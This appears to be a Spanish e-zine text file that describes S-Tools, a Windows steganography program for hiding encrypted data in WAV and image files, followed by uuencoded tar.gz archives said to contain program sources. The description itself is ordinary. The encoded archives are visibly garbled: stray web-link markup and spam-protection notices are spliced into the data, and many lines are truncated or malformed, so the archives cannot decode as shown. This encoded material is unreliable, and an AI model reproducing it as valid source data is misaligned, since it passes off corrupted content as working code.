      �������������������������������������������������������������ͻ
      �                         S-TOOLS                             �
      �������������������������������������������������������������ͼ

	S-Tools,  escrito  por Andrew Brown, es un programa para  Windows  que
permite encriptar y ocultar  datos  en  archivos .wav o en imagenes en formato
.bmp o .gif.

	Este programa es freeware, asi que  puede  distribuirse libremente, si
bien  hay  que  tener  en  cuenta que, dado que incluye la  implementacion  de
diversos  algoritmos  criptograficos,   por  lo   que  puede  estar  sujeto  a
restricciones en algunos paises.


	Es  un  buen  programa  con un nivel de seguridad aceptable, ideal 
para
windows.

	En  cuanto  a  los  algoritmos  criptograficos,  se  dispone de cuatro
algoritmos de clave unica: IDEA, DES, Triple DES y MDC.


MANEJO

	El manejo es muy simple, y se realiza en combinacion con el Explorador
de  Windows  95  o arrastrando los ficheros. Seleccionamos en el Explorador el
archivo wav o de  imagen en el que queremos ocultar los datos y lo arrastramos
a la ventana de S-Tools. S-Tools  abrira  el  archivo  y  lo  mostrara  en una
ventana,  indicando ademas el numero de bytes que puede ocultar como maximo. A
continuacion, seleccionamos  en  el  Explorador  el  archivo  a  ocultar  y lo
arrastramos  a  la  ventana  del  archivo "matriz"  que  esta en la ventana de
S-Tools. Si tenemos activada la opcion de compresion, se comprimira el archivo
de datos, y despues S-Tools mostrara un dialogo en el que nos pide la password
para la encriptacion y nos da a elegir el algoritmo criptografico a utilizar.
En caso de que el archivo "matriz" sea una imagen, aparecera  otro dialogo con
diversas opciones referentes a como ha de manipular S-Tools los  colores de la
imagen. Una vez hecho esto, comienza el proceso esteganografico, cuyo progreso
podemos  seguir  en la ventana Actions de S-Tools. Una vez terminado,  podamos
grabar el archivo,  haciendo  click  con  el  boton derecho del raton sobre la
ventana  del  archivo  y  elegiendo  la  opcion "Save" o "Save as..." del menu
contextual.

	Para extraer  los datos, bastara con arrastrar el archivo a la ventana
de S-Tools. Una vez lo haya abierto, pulsamos el boton derecho del raton sobre
la  ventana del archivo y seleccionamos la opcion "Reveal". S-Tools nos pedira
la password  y el algoritmo criptografico empleados al ocultar los datos, y si
la password es correcta, extraera los datos.

	Nota: Los ejemplos se han escrito con la sintaxis de los sistemas Unix
(Linux, HP-UX, System V...), excepto el de S-Tools.


	Aqui  pongo  los fuentes de algunos programas para que vayais probando
el resto los podreis encontrar en la web de raregazz, aqui estan uucodificados

	Nota: Documento basado en el original de Jose Luis Martin Mas.

				>>>> TEXTO <<<<

begin 644 Texto.tar.gz
M'XL(``:14R\``^Q<^W/;1I+>7SE_Q81>6Y1"TJ1>2:PH646F'=WZ59:5[)6M
M4D!P2&(%`@@&$,4DWK_]ONZ9`<"')"9USEVJQ'4D`ICIZ>GGUSW0OO0NU3`(
MU=\^X:?3Z>SO[TK\WNYN[]-O?-LUO_'I=K>[LK/WQ?;N_A<[^SOXWNWN[NS\
M378^)5/ND^O,2\'*Q!NK]-9QMS[^JWZ.C^6A'/F^%.*!/(O\>#)142:S<:!E
M'$E/ZCCT4EQ,/'\<1*HIXU1ZT4S&&>3E[LIID(UEGBL0&"A0RL9>)B$RC6]*
MZL3SE?3'7NKY&68%D&#ZI9>HZBX70H^")J/V]\?+HG[U-B2?R^/BPCGVT?/\RK0L1!E%^_40N
MC\%FC)/*E-O"!JQV`HR"ZF<3K0N(C'63NF>!`FF
M$]D:2C].E=W<%C8CQ"#0646^//I`PE.D?S6T;-'5UH$<_1(DY1UQK_^_E/[?
M]HZ>ONQ]VAAS>_SO[NUM[[GXO_?%7@?QO[/_Q>Y]_/\S/JTU/D)*^:[WKW>O
M94N^@T5*>._(B^)1ZB7CF5B+!--@[T$N:#P)*-%XZ8R.?)RF3E+Y-Y'0<
M^&.9I5ZDAW$ZT<*EF`&EH6242$_[0=#RTDF#:85Y$\KC8CI6
MG-@Q+HHS&62TC7KEV&%PAK.<)D4R\-`O\'`B!OL;``EZ(=5+\%/"K
M:.!1=)+R%&NR.&?2]Z(-J!N_>#?82L:[@WAQJQ3DA&0V`MX0Q"&DU??ZD/0@
MINEC[PKD8$&\+R_*60MA'%]*Y!T%4")+2RDIZ1P/%&T;&@^0#PJRH]C8"['4
MQZ;[N7^ILO:\I6R`RSQ+\DS@WCA.U#"G9?TPUK"3*,Y'8^(G@J5"`,[TV+PY
M'X(NKZI#9,S^3!",N@PBSH->GL43CS9.HHF@GC89:NDV3(:0NC;[#(-+)-9X
M`G61+OLJFRH8\`1I-0SZFO7:QT42JRR=-47#"[.Q89'4,(C-9,A0LQ*0C&`'
M*L&%G@1(/6F>C?4FT]&8&`[(2GFO8FFORNTUEB.87^)IJ#B8P-1;,"M6`MD:
M;XVLD8@BBY-3IKPR63\](@A9?M?O"+EZ:J78D;R'276OX;\=KLW;,K2)WW
M=19D>18`L/I!`O-M&ANP^`*YQ{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}%H6>3?@SE(YAC.[,R@D@30&0X:"Q;I]DF)5W8AG@%#R%88=?A7.S<%/Z9AQFIQAF"!XRE@U#`/((0.2
MCF`]4`JL1T"BD6[**Y7V\83O'HN&"-6AZHA(1Z.ZY;,9^0@]:9]S[\D+G--V\J'O1D031DU.1,""`C+`XO
M,7N*TV"!N:2$["I[!,P0NB[G:<7^(?F;CQ6Y'$<&$:`"G!371$(84D1%
M##:"@Y0@3;GW\KM*@""OXICM98*5!,>`WV@=],F\XI!-2YMUS&;P8()P?L8[
MA'ND62&[*?N*F`4*OUC%<(&`O`3FBGBLN,!"SIG$.ILW'5H604Q7U%(F>0^>D$W'@O4?_*(<=QQTK7(H6QM_L/HM
M4A+M$DZ+?2-Y`88DX)3T)^`._]F[KA91_^EVKIL6+$':E2!324M3!%2Z@VQ`
MFPVRMC@F9&,EXH`KY*D_/FGP;E=G`:(@L99;P7..E160("%>]H*QDQ(*1
M0^51#.*A+,+M=D=:W/&65'<:QPRW/!9!!,F0D9NH8N!"Z1.Q[WNT=\[R29@#
M7T"<`Q+[8RR(T)'#8.A.HX4%-CEH4O":;6!V9*-TJD:,5-B2'MN`2T%/&<>#
MZN!X9(=D%2,J6U6(,G($!0+,7++.?APC6-BT!V9.D#-U$I#W!)K'@PGK0YQG
MO0'%FPA@3(SS"3E>3"#{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}@WD%Z1@"O0L)1?L74B#%%58.,)T'#^>X@OYI)BF
ML06H;+6>%BF>)2/05G0"JT%^CB,;;X.`#$HE1,:4N(,P)T0)[X6M;/6(
M@J'\A@()?W,?(/\"A2\!-S>-(920=W[FH!'#.\JRVCH".T_=,E!?@YQ;?D+8
M@(/##67"&K2*2J+`6VW;+)"MI)#*-T2TE`^{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}^8QOZ]A&D^*"1;##G)L4[Q^
M>R<7JVJ;@B/GZNRLR\S]QI-;PX*:K2XX;EG0$PSG\ZS%R.LHC]>`O<&2CD*J
M-SRRW]"&"P.0>?-KT#*SX"CTF04`&%/.%G,&`V)O!:RC^OR#_//ZGXY\'!
MG,#GI;G,VV^8/%`<33*]#SRJ*,!\)QO)]&2Y9S;MK6W$UC^@%RMK2S@>($.1GL,MY^(E9T0*I]!Z`)@P_[
M5+AE0&D4KP#0WI[[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]^ZV.^V]IN0NIKRDJCZ47=R[M@7QJ6W+;[=W"$G$J%@#
MH(<`.81+)&1J)>L3^=T)P\?7Y""!UU$U>A&9>!4E"_G^L"?J1'01W43A@S
M4^KD$X#3^1.`U0<`8LIU3&'KC)BX[ZNK2*72ZD6&S"OG#4K4;9NR3KM6#F1,
M[`I"O>QIR/38\DGBZ*N")F8H";`BT_3EGEBYT@6=9)G/Z'P`,#MRBK6=3-
M$%VO8*L^@(C/J=^:)Z4_4W.WC,RKM5D_]*++NBB[3U(^0TJ'IRIN75"J=YNQ
MBC/AA1:POWQP-\SA0'U8JR`P8^JJN6JSSE=U5\K\MU&?]H;*54"$\,T4,EA!
MMS284*%64`CI+;M*-E:IPKS\#&^<<:!D2@%1X`V*$IF4?Q;+[8+T@,@N{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}
M"T';56XA?2VFBMHBILN0Q1GO>Z`(0Q)/D[+61"EO2V0JZBM5,E^6CPR@,'@*
ME]PCT62DI]ZI*FK5EK&&U6(]&*'&;C,K$:A52#>*94=0M,:K#S*?8-@*IJB1XH_C!.@':PB@!QZH64C6:N7,>=!NF6$L`@
MSBE)^6.%>KSP^<+E-568AAIR5A3\+%N#^F:;Y2Q,\;+8V.!R32N&_>ZA07X0
M6ZCC^?X&KJD>$.K:XT8-&*42I*@X&(*;[&![K&76,"H_*6W7HZ@/TI0**EHQ
M"3"!G1%'MGO`D4F9QII@Y="FL47?=$(8*,9T[)6GF@KDHE5A"^K8'G0ROG:X
MU\P5S.^0+!R0':C5;R\W[AJFLC2T'B$&ANJ+R:QQ/"<";$L4BGV)GU*$`
MBC<&E<&AE.FX(EQ2XUEG,]HQY!K&8!?Y`V,'L=*P#7AB-`Q1D96:KLJ)&P[P
M/6R!"J=^?*4LUY9IQ[.-,(I-L^[R>=W6)U@ZFP*6F38VL6_Z$:5\E;0M9&%;
MR%P&F8:M$^]"C!'BN[/GIZ((W_/@B_J=VDSFO$^V2_))7")7$"/5(S"#HBF+8LN863E,&<7J)
MO4`@)@+!*LBY8>'I>-7C8).F(Q^WI#P9JK3PH!93+OYPB24-LPN%;<%KKD
M4[%_Y+X>M-4@%^+%R7'OU6E/5+/M<9Q0:FA:,S8^!KXK[2YAG%4[(TTZFBXXH4C-H#&9L,CJB@AU]0T0AWTMR0
M/#I[]_WKM]6R%O_]4UW!DE_21NAR<4NX=18AUDV)M]-XF/&7-ZQP=O@7&8KF
MDPC<\Q9H0OT8^TH+).)IZKD0INA^]66W+L1?2/_50^1/=<9(Y[^[-[__L]/=
M*=[_Z79V]F6GN[W3W;\___TS/@]@MR'*-E=?C6&^5W$PJ+Q=T-@4O[+/47L]
M@+6!J!&0E]2/>K_=.<G_')
M[R2AFX^WB/PP@4MEPP;"LTJ1(.LG8"&@5E\!=S]$]4V0VWK,_!A8<@B0D:BH
M8;,=YJ4TB/@=RH8=8J9`PGYDZ1!MS'D'6/T
M^B81ZC@R-6M18/+=]R>OGA_PS8_TDRH7N8+.#U0$W$SFA][;[]:@&2YN;:;UY<72jumi,<.,H9?/[%'>,ZJ[4@"
MZPT9''8.9/"ULU=\__SS8IE5:B4O;M,=2XNODUC#`P\K$<$],23]&.#5M"5#F?F^W=?X^.+])##R+@D2IR4![83+VV(5^K2'L
M23Y!EJX+@KAFVDR89[Y@/H+C$N_/$)WU&'#`O352B8ZT^Z\?Y?=[M#^*_;[73N\=^?F%__@MU@:*M9'?I)]7'LDON
MNPH:?HC,$:8][GC?2GYKY>?%B<2^"*)9)E$(91U:>3+-)P@
MNP=S%/@9P8ADUG#J,*H%*1.OG.@XTS/A"A:R;ZI@\KP[!_8D>T7T\M@^J0=MNZ@^D[;ND/[>[RHI6M']@Q=\A
M34Y7"A/B635C"1[4H6&O2JGP0>3BZT&FJ#324@=]_R4&F*&_H[*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]'7-TY^
M7.%L?+])Z3_%#OJU{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}?>`S@`_U[WK/3U[A@HX^XH2ZU"Q&%]&LHW1L"4H8
M@JUG0.]BFCX2DCT)UD+UXNW7$J4XJRUBBH%0=5H90W990IU2((OCB-W%GGH4_'WB!C$@HKEF>R
M.N\,#XL-D&K_@ZE66B!D%59R()LI\=.A+CMM$$P@DW:::ZL\;(X:#PR'-IW
M"[@@@#^UY%>2;:=2-X3Q5*6+-*@;M&F$U9)??D&{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}*%+%';V%BGD27('A>VO
M+(6=?5SM=^5;@%CT
MKC[CFQ:K^4:-9%.`WCEYN1%4YH0:8R0-W,$(#U^9CQ>#;V>"&UUH"X9%K,[)J
M].V<%&T\+/C5G=P4H]?FZ*89=W%E%;6_!DN_2U4KA]_4=%PP]-5D*\]+CR^H
MVEPH5PRGA(G[G`OML-;V>5&VF,=P14T)A0*M>2MBF_{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}A=.M-,4JO8BAVW4;
M$&I)GM%])K"*\>U5&BA6&VTLRIK.TE?1V:W06;67[OE!;6DS[0WYVV^RN/QV
M_O*SI<4?^E+6#;BXBX?EO327R#57[F3G5BJZI/)G2]:)K_+T&R2?SB*ALBN^
M")YJED)C*>R;HD(63-7RB)\#RLUE!M=,--S,0QDG$-\,G?>/LJ`W",8Q:P&T
M^$@VW7OU=`Y6,@JQ<+-2$!RFK_]$]^.
M!L%0E/(P0)[:C<7[HE9"#C6LKHNX<4M*+$&?W6TEVMCFKCM7?&]'P#DK[KCJ
M29.>0'7CS4QJ@T7^.%%[&O5H;OH.
M-:38`SG%&#=87F#NSO;2G9UE)NRBW%ZSYYA%+C'J$GWAHB-^'G]`I"[ID]
M?5C2J7ON,&FG79Q&FE+#G%(N'$H00
M0<&0:GWC:K(RPAM_<;W!(H)C3X47+`8*TRM;#')0R'[W]P4YUW];=$N+2(,2
M1QB_K-[?W[$/V#-M.BNRSQ<0Z;DYOE]">>>+P.Q\'E*?F_/THM4A;L&#'&
MR:\KTDMJ`#?NE*LXJ6*@8Y+*2MN[Q?0PJY3?0_]#!"4P\>JPHN%1::S\W_0[
M[JKZJ4PDVY525(IZ_A-(TUDS?_1N7GI-=>:J1]=Q^R-=!>G*7;OXJK;"7)&Z
MHA^P:LX&5+$A"^YN=K:5K0#R.*J2Z_C?8_,$J
MGB[4S[D7FF>
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 [R=GAX][_'=#]$/*J4_VW\BM]O?NB.Z
M^SK\O@[_WZK#Y22`
MY#&7I>K#!;_N_73S>``3A#4I)?LG?+*9-^QRW'+*S1GH0UDVIP-/G?WNVPJA
MGMJ\EW)^.QW[_F-N6*PU&6@E[(9W=1+K(&ZSSU&6KY;`X0BZT;^#<6"N9NBA
MO:2A1Q&4\#TCC/30NIM!B]!'^]>@V\GO.`8>P..N&39+1+\Z;QCN8JGKILP/
M0G=F3Q:3J1(JYP$A,3A^;D0K1-YZ`3UJO_?@]>]{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}QL['3:,T<.$_@G]U3T7
M!6%KPT=;F[UY]ZR"ZT)#6Z);^EMB3I$=G4&GCZ]Q;=1BVEY)YY!N-R6_"CZ^
M_H_OOB,6BXRE!LYQMW(BRS<<%,GR"\RVI_*3;PB#(_D7J]Z"FQC&HO,O8DCA
M1V:[I4L&M&8(`:_6P^AL:/=,=I5]YFM^YX`AO99F'U*)]C;3((++B9U3K6{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}
M'3^W8FU;DT="`3/U+%WM.YZ*XBWEW6#JT%08AO]\
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 *'
M_K0C[LLCUX?A164XY=G#>6X\Z*+$;?D22P4_IH8P5SY]&(
M"4%3JI%V@HR@,G[/6.,_=;=:V]^PB%G8O2F<2_/K5WR473MT1@<<-3D,4*
M/:3[^8-YUK[35]<#0Q5;S`*0APK:SO=^CP9_-X`ZUF4[9E]%[(I[%)5ZHM-W
M9$^QJ4%&!^G`6I1,;RBOR+4$,>"`*%,%!$!-QP]1(C&(!:H_G6I)S4C;Z-<0E.PX[,-
M+E`5+KCN6$?_=G'\A].'$:+S>D$A.,1@L:S31;,X,50T@%YQ[!^$LZ4R"`.Q
M0'S2I43W&9URC)&<([T\X;:N38R"M,*7IM`7&PW&*AL;''46HS#B>!,%O@
MJI-HYR-7P)@:Q\_YAV4GF'-\N,(O'D4GP]$A?AT\'IT.#D>G].K)4Z\RD>LR
MI:5P)95/_6_4RTO]UO*H946_!'.?XV+'C'X1F6M$=RD23#V_7'4I<2\O[3(@
M"CX"3VP%51TLFVT5FRT5296W<_"9/V%Y64,#]1,"KDGA`TL;6*8W:]JO;POC7A1Y#SNX_#>$L':!@@%
MV^=U6AJ$MO(->QK;334GOMJC`.FM#1/$?-OR%<)'Y,S"TLLC#@H55XCC(W%J
M]"UO4D".T!7Y=!'T>\I6L-US,8KI"<9+0^&]E#"1:?G:H//7\"G-[!]U]Z
M8;83.C7(\#$;R*U;N/59<*X(SPE7PN!X-'#-.]GN;[AZ?`,.KUJFY]OV)-,X
M!)TOU##KCKH=84]NGPW]86KM4@QG*0'22W32$@%8'/B%$X/NO]?JK$$=O,138[H?^[IQ9/$O7CS9@;NCH
M'=Z;OS"9+F4BFS$$R<7C@JG?Y6ZJY\?2JC794X]`?1MZ%:'_=,XL<
M/N^GE>W
MZWFUJ^==7NW!,-I(C!!QB47(AL!*4_=9B*0DSS@/2R;7]2K]MN$PF7[O/">$U4O+Z+7E=/5>OI@8@ZUD%H]KJY]MK(H;Z;R[*3SA#)QX
M72[K78RD9`L6>=Z]Q\%TR39IE)5,<=I.WB^O_&?%!.8L=Z"N!#;(M`1'.$#^
M6-#TJK!/1L;4K%E9;69P-9+<.F#X>VH=;1\,-$?P1BRA)2>Q&%,S^D/'V&&#
M82&4#@^ZMM*6,;_A2,)C5{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}-(UW^TS"F;R-84CLY[O,H+[A-@3ORJ$>E3VO&
M13L,.0XHW37FO+-Q/R87AR%&A%H1N9QHAZNE8I)!BYJP79;`OB.`31,5VZ1-
MUJ4NVJ"]V+);,^UDB,2T:S7<8=O=S:(3[/_A]C?6
MT"KYS_WVQDWL$S[<_0C+W/Y5+J_X5P@)LK[B[2JLW7+7DQRWDM>#R#]/VZ+B
MCX][EM$.U8^[/^*6AR9I@!-K'00VK#)OM&KGB1!SW/=/OB1W,^?>+LR#[6B9
M%#9,L#T>)GK![07>(8>DZ+UDDNPWA[R=[J!,$JP5+/!G*2D.Z=\).X=XA$RI
M;]8(6L=@U(.!C\`T_;2C]J7;SC%">GK0_21N8&XR.3]#DU?/1TT.
MWUKD.MCT(_1X$SYV+H7$:/(/)D?31XYF,SF:&Y,C1.X6!&EZ"-+!R!)D?-/8SR>O02@D,3"4VJ`FXJH?%IVTU)QR0KDH+L=I34536(3(
M!VW!M`FHS4^$Q8AYWVH\V^8U>Q1S8%G(43[H1RDF?;YJK]:#W&V#%6\O,A
MV3*GP[&0Q(FF=1TZX0_VZ\LV]:]DKC)_Zjumi+('PD6Q*<")#3425ZDG$^+]>*
M,;PD2>[]5B'>-VEB>=L77]/:2YPEF9GA8H+4PP94ZQ-X8H:G^Z5-TLP!#HHL
M*ZZ)C%\Y?.@9#B1E%!O0.6]#NY&PWBPF6:WQQ4,FJ1,?Q&@0?1O-BB*)=%6G
M2'G/:6J)H)SHV8-B5U(65%47)>>4]J"=`5I`J-8/BX<1:14KSEDEZPD'GS.3
MM8`@5+$<2>O5D3';L1-RBHT07AS@#9AWACC*0`E?,!AG0+*KCOT8!@G-2H
MUO!R%($]CI%O*&Y#)#7K8FR'/E\K#9#1&;##T`&0(S:RZ:?Y)9D).M<;K0
MWW19`-N+X]&I)*;N]XD[{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}!>T#)P69M\S$<[>LVJR?0Y24D$$)'7Z&[Z$?#E
MMU,&B(XQ+W/^R83&H#WZ.O(VYV1LVATD"`,+:MQF^R,62Y=-9E))279Y?]7>
M@HBM"NSL:PT(R4,5E)"68QKI'XGM1(W53!0''&QAX2_L29QQU_\TXF9W2C
M'D/6($BMY][5;1+[P188YT6C/I,,,XO4&+GXL@*G=IRPS)O\J/0844",T_?7
M9%BEQN"BPRY9
M^$A'R.?%CFQZ'4R.F3#L1?4!C#2,ZK5:`MJFA6D#B)_P?QT'91<9S&[G-#-
MX0*Y`\HM*Y]VL)+Y(S:%7>+[R]@05',;K#H+]VH=V(?C)82/[`%7+^'M]'!C
M]J^&X:>2L7)A8+V/X.TL09XC{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}`5RS=1;]6ZX,ZU{jumi [*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]}QNC:'CVE^)JZXV0
M+JZOUW'UO.?];$YNC?\_1W%7/?ZRSZV(+[N%UU_+AN
M%]T)VM3DIP[LO;:K?NG@CTV2.#*RF$!;JZ=7(M\!U=!"0@[)6:9]B6YGK[$$
M*C,_.04JV0"5T?P_B%.Z"OD?&72J_4ZY02>
M4EY6?V@K\:SIQWJFUJZ_9M![#DJ9_W
M0ME\%L)@`.6%?^NF"L9JTT'4TYT'1="8_U3C;P(8?=(])NS_?;DM_^O%^O[?
M\/Q\G__KLSS8SKGD\"'1I40#B2[Q?V7E^Z6+&Q)=
MK0OA-0D/WFPXUDTLSFIL0[R)^HG'=*`UC7L_;"M+R1X?N*67#]\")*=WGXJIB1(
M#6BSO=,EX8GZ@7-Q;VC4@.(]L;4.0Z@X(-Z.Y89V3CQ@97*1+;X=1AXI
M7jumi\`-Y#G3=]ZEK:>SE>*J2Q[]A;DJ^+!-3A'.HSLC2JVF%UHOX*X^W6
MO4=MOW-WQ]TZM7!.3DVI,86[,]L`$($&E<48X8R+2TA:NEZC?J+YK[R,5[
M9X+E923I3O@:1C]LUY-=;:XS;+4!E.L3WV!(*X\O[;*Q6^L;]7INME_#9J[M
M!E9/0]CDV"PZOB\LIJ;"ORAVG^%#`:]3QZBAZ^<7Z0.^FB95??)+>BR3)
MGSGV%*^UDSI3Q(O=1KIOU,LOR`J.96Z&K(>;ZI?M'.R=/2^GF\#SIO]8;AT'
M@(\VU5C$*SN>K?AN1:EL8@;@900MG#B0:33C5CU4O/;8TXC>E[;5%[IO"J93
MGZO2BNM[S>S'_Q]P_$W6ST]J8^RP_^C=N8O_@@]D_YT-AWO[[W,\#])ICHC@
MEY=O_O1?;WZX?'%YZ;;R_7?;SPSH59:.-YPC^,7X`,]_Y\+.V-M*MH>.%>
MV6!3T9<72B*=
M,^^=G4#G*@R+^G=UKR\`*X>/L6[:_,>RJ,QOQA/\WGM"6'+FFD"H-H6N69B9
MA+D<"/!I&)Q'HM9QJLQ:E[FL[<+DI/Z7,+FH_R7(>.A_"),7^E^"#*8]'TSZ
M4_,E70^F%WYRT=(Z[;=!OSC5JHD:OQ__CS?^7/03RY@=\O]\=/ID??U_^F2_
M_O\LSP,X#^2S2DW+8J:6.E=Z-E/CHKA2D[A4";V<9D51JDE6-(FJ*R+*[I95PKG,-?Q_5DKJIYH0$SH4JE
M6J:YHE507>1J%B^TQ)/6U$Q<40/EBGZMXF:B59UR"],T6P!80HU6_*XDE%$S
MT83-DIHME<[?T8)WB6:6:DZM5_.T).P8L>N4^E<4F5HV":"4M/!,RF*IJ@5U
M<@)<:;4/'%;%+%77A-`5%:OCF8HGBU3(>ZTXS;/BXTL:)")2(F<'U#9ALXAQ
M'`'"$?`)G_FIMPV\=FC0$"8+%%3R?T:KW5Q55RE^HZ\%U2\:JHHQ*(I:76F]
M5!GZ,6^8I:YIE'5,8YJEBS&06JF,&M(`C3\J[.FHBLK5J/^.1#^]([#C9D5#
M2,@N&_P%N$E<7H%S\UF334E>3O6LS!@SI+"9":E7&U)%+D.3X]B'[D#5DU
M1S_+HE@H+`BNJ=DQ7&N`%(U`=;7"QRDQG\X2E<6Y5M;3C9@A)3(F-#50;0$B
M@Q`59DA-9:_`,65.?1CKA)L@09.D#7[28H.Q+/."AK6D!L+UBN4]5B.+S@N02WO"@+$`'S+DIO4MG.?_A>
M@L0Y?5P45+"BL&.:-,,412K"R(M?*8YI]**VHI(2&@\QA3=D4-3JBY&+,;#(!IDA0EYO,"
M@T(`9L21&"OJWJ+(&^Q.XY>"<)RK8@*>(OR)O@^B;Y-WF#L*.7"R%7$DS1/Z
MF<6_I?2CBI,,]-)+^C&/ETN\U'&52E%=HRA),OI![`UG0X63--2LV2T*O^4Z
MOL(7<#Z.C%8*NSDHFI8+O*?O4J,@0M`O1/B:7S3+%*"K9LQ_-R25QO0+G^
M'Z?4I7H._!BHUM)^3),\%?C\?J'+28H5-T"DBR6WJ-%BJ8G#N635E"0R^<00
M/*3\&Q%Y.B>D:YTPWNRKI=I[*S27]$)J4]]J*4,,`329A!G).6!7
MIC/N4DVREGXT58P.34HRWN6GM@US#PVB8YI?^!DGB[0T2(ZK(FNXA7ABD(@7
M-&K\E=8#I4Y2P&YRF;7<4*D%VZ;DUFER$&GYBU>(Q`9-+?IE1FC-!.!UG//_
M]$VH"L[YA68_,6U%^#6DIJ"(D44AMY3+Z
M-/&QAP[EFF-(P!E$KF8,UL3?18.+OC3@*UQS)]ZHYQJHDPZOY\"U6O#?P+D8
MUY!@^_'_G<;_][8_]\_^V3_[9__LG_VS?_;/_MD_^V?_[)_]LW_VSZ=]_A<5
'``U5`,@`````
`
end
sum -r/size 12165/11797


			>>>> MANDELSTEG <<<<

begin 644 Mandelsteg.tar.gz
M'XL("&HKQZ@_V&:(M<[+4)>]D[,WO;_\H7]:Z\-.1_-?K1^M_*OW'NWM=;4^.-CO
M[!\>/GJTAV?[C[M[?]%_+%=?__BGU,;&FR`9F;A?FK'^L=ON:'S5+\]?]&[+
M/!B6\@RS=G__3ZFKB2F,+N>ISO)TG`?30@=QG,[U(IWI,M63:&3T,$U"_)N4
M41#K45`&.DITR+WP'1OK:!J,3=%2X^@F2L;@!Q.&N0D*,]*QN3&Q3D-=F.$L
MC\H%R$VS(,<0Z!F#T-!U%863WA]2C
MV=#H%/OD7J9BNZ6+,LW)&/20B\P*,I.9(C-#NWP`VI"+#^V>671KXJ*E@Q#\
MZODD&DZ:YS*@9&S:B5P4+6Y:"51=`L>3%N7CD)2A+?S>(@,4M;M)5JJ"`J
M=$*!H1X$WER@T601S@M,37(1Q$WG!HH9%20VJR`8,II.TH3O67:X[8^Z9^>
MG^\&^1028P%.1,LY;.MCGCHT,PET
M71VHMN<)!4>Q*436`+JQ2I]'Y01R:!6:("=_D"&/BH":G*1SXZP@QQXYM0%A
MH<#L']F%:53*GR46KLLB"#
M&=R(IFN6%8)&/M-60LP)K'DG"SE&5>\A
M7E63MR8^F%DVDDV:!T46$G(L>"AQ^D-!=L\E"S`I[&MH!
M##H.%K"2CV!-/`22#7`V"Z@>!R.F)6S'1:H38XUF;$IH&H<*!9#_;(%/2KP8
MA@R3C*"XW[G=/^H(
M$#NL&)DPF,4E(5<ELK]2+-'7S,35'644Q.M=6D#BG=Z:PII:*H7-`0
M_)-X89D-='?O:'>8QH29(#8E9++!;63=0CR7I&01N$D_%TI(4RDYS#H?`5O%
M&([*3] [http://www.govannom.org/e-zines/raregazz/rare014.txt]@GX6-0$;PF#-G(B4H.6,2PR/,L#*.A#T?%++^AXP,19GF10D/F-IC2
MH<7,"5TB,Q:F@YN([L`C2!9I8A1`MJC%#_)2&%L&KET.(Q,H(YI7[F(7'4?D
MFF593(UY=83N(*QMR&&"E@LAU#VM2KVPC?CME
M`.==T!(U3Z+L]"](8M14$S*'%XVY]XNI1@IJW*]=W"X8JCS"CO"
M3+33UA?6(F*ZE=6E4R*FB,./4L:\ZFE26)7[F"5)68"]@Q&S-D1H:!3J6!(&
MIW=NJ5MJDP#F:A+F?:#,-(@V4V5P2PIKU@&_:SYVIZ.UW9'QY:6^;;D/VX$/E]AL>,'`QPZ:8>5O$-6Q-J@X4X-Z!:+FP.0MF_;-(Z=J
M5W?XF"4@PMD%\#5IZ^?^HV9U8:SU#HC$B+@X7JAG:"P:<=7/B,O>;SE?ID_3
M!G"W-7(C"5V2`]5B!3P#RR-U[R)$,QXYNBPAHH+PQO`"X`R]&NKTK@XX8B^#
MS`75=8NI=U1V2\A/\EK"\KFU000F'Y0;X4FB3^)#6AV%4&18EW7L%*XT(-
MQ89#536#")AD3%:207R>#:,%,52O!>K7ND,F&F=8J92-/(V@]J.6>Z@(;U
M\_Z91A)]ZY*U)JPVBP8;-NL""-O!:X>21ZA\EB#K^&QLJNKR'E'W+/#L_^]@!DJFFMFC,Y!UK_C[W+CSC]=,XDPQ4E(
M<+RJ1PK$T/^=1%G74R,29OFO?#\)]!OI8-&RA/<>"4)[*,]R^,0M%92-,\A*S1=,
M#LN"(NI?/.?X]"45LCDH_]O#?VJ#_T=L[D@6RUR-<0E;([HLZ1-),0/L;TEK
M^QR^/'>9ULIAZDX$C2
MA983#Y"R``G6+(N2YI8G8^>#CC/HQI:JE^>0#!!1LQAC[2+;7)?AQ]-H32
MI04.N&WZ#=R)7#J.G$K.6^I[PE.NJFJN?96!@8=K3@\C8UWXK:INW;1W6B
M):L!KBJ+,@GR#@]\*C7TY"&6#0.IC1"C7F0A@H[EB-VVIXJF`&F79V-BV
MW7K"Q_C?=UE50UE*?3`QRMH0!_69&614;MH>F/`M>1BVDYS.M@@J:]1_%9/\
M:R/9\-V?9GNDV3QB;I@',3N,"T;M;Y[U=`/R1%U+`@*"Q:T!TN4A%!%1SHC
M2UW(>31DUKK7J$])9AD^?-,(S-)4_C[#(P;AS3H#V/2M/=&9+2?)35UJ^A3*
M"+5O]7D)"UK8+E@1W9;T*5.#=6
M+,0V4^E*N!S2N18F8JTM<1P*6K%(:K-O0]=F\_K%[B8YE#U;[#NHNIQ<*DCD
M,AXQ!\AA6\E?B`U,H=E89%.;EN%;2#12#V&/P/LB`V1+M1NL.SK(%U%A&UBV
M/7]PH.]+TS)'[*Q@-(Y`^Z-R73F*US\QZ'EOWPON4K4,'XI+45NU.WW:T>JVLJN69
MLUOYLY_3:T=1,9[Q,@E:VQ<,KJZ8G.*WMG6(V.4+5;GI:L*/3V^"T4ALR>G-
